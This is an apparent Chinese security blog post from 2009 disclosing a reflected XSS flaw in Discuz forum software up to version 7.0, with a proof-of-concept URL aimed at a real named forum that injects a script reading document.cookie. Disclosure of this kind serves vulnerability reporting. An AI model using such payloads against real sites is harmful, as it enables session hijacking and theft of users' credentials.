上一篇 |

Security

Discuz <=7.0(frame.php) xss Vulnerability

作者:ZhaoHuAn 日期:2009-04-18

字体大小: 小中大

前段时间做风险评估的时候发现的，这个xss 需要在开启了左右分栏的情况下才可以触发。

PoC：

程序代码

http://bbs.cctv.com/index.php?gid=24"></iframe><script>alert(document.cookie)</script>

----->
跳转到了

程序代码

http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

[本日志由 ZhaoHuAn 于 2009-04-18 10:10 PM 编辑]

文章来自: 本站原创

引用通告: 查看所有引用 | 我要引用此文章

Tags:

评论: 1 | 引用: 0 | 查看次数: 2280

tiger-h[2009-04-19 04:10 PM |

]

感谢已安排相关人员进行修补。

发表评论

Processed in 0.234375 second(s) , 6 queries , X_style>->blue_Gray Design By ChangHua(FatMouse),Modify by ZhaoHuAn

昵　称:
密　码:	游客发言不需要密码.
内　容:	正在加载编辑器...
验证码:
选　项:	禁止表情转换禁止自动转换链接禁止自动转换关键字

虽然发表评论不用注册，但是为了保护您的发言权，建议您注册帐号. 字数限制 1000 字 \| UBB代码关闭 \| [img]标签关闭

Discuz <=7.0(frame.php) xss Vulnerability

作者:ZhaoHuAn 日期:2009-04-18

Archive

User Panel

Recent Comments

Guestbook

Calendar

Category

Support